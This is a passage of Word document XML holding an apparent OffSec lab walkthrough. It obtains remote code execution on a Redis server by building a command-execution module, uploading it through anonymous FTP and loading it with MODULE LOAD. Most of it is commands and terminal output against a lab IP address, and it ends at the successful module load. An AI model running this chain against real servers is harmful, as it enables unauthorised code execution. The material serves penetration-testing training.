      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">official offsec writeup</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Redis MODULE LOAD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000299A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000299B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since we appear to have anonymous access to both Redis and anonymous FTP, we'll attempt to combine these two vulnerabilities to obtain remote code execution via the Redis MODULE LOAD command which allows us to dynamically load a Redis module from a local path.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000299C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000299D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, we'll create our module. We'll use the ExecuteCommand module from n0b0dyCN.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000299E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000299F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029A0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cloning into 'RedisModules-ExecuteCommand'...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029A1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">remote: Enumerating objects: 494, done.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029A2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">remote: Total 494 (delta 0), reused 0 (delta 0), pack-reused 494</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029A3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Receiving objects: 100% (494/494), 207.20 KiB | 349.00 KiB/s, done.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029A4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Resolving deltas: 100% (286/286), done.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029A5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ cd RedisModules-ExecuteCommand</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029A6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~/RedisModules-ExecuteCommand$ make</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029A7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">make -C ./src</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029A8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">make[1]: Entering directory '/home/kali/RedisModules-ExecuteCommand/src'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029A9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">make -C ../rmutil</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029AA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">make[2]: Entering directory '/home/kali/RedisModules-ExecuteCommand/rmutil'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029AB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029AC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ld -o module.so module.o -shared -Bsymbolic  -L../rmutil -lrmutil -lc </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029AD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">make[1]: Leaving directory '/home/kali/RedisModules-ExecuteCommand/src'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029AE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cp ./src/module.so .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029AF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029B0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, we'll upload our compiled module to the /pub directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029B1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029B2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~/RedisModules-ExecuteCommand$ ftp 192.168.120.217</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029B3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Connected to 192.168.120.217.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029B4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">220 (vsFTPd 3.0.2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029B5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Name (192.168.120.217:kali): anonymous</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029B6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">331 Please specify the password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029B7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Password:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029B8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">230 Login successful.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029B9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote system type is UNIX.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029BA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using binary mode to transfer files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029BB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp&gt; passive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029BC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Passive mode on.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029BD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp&gt; cd pub</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029BE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">250 Directory successfully changed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029BF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp&gt; put module.so</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029C0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">local: module.so remote: module.so</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029C1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">227 Entering Passive Mode (192,168,120,217,39,107).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029C2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">150 Ok to send data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029C3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">226 Transfer complete.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029C4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">48560 bytes sent in 0.48 secs (98.7207 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029C5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp&gt; bye</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">221 Goodbye.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029C7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029C8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finally, we must load our module into Redis, which will require some educated guesswork. Since we know the FTP service is running vsFTPd we can assume that it is using the default directory location (/var/ftp/) which means our module would have landed in /var/ftp/pub/module.so.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029C9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029CA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ telnet 192.168.120.217 6379</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029CB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Trying 192.168.120.217...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029CC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Connected to 192.168.120.217.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029CD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Escape character is '^]'.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029CE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MODULE LOAD /var/ftp/pub/module.so</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029CF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">+OK</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029D0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
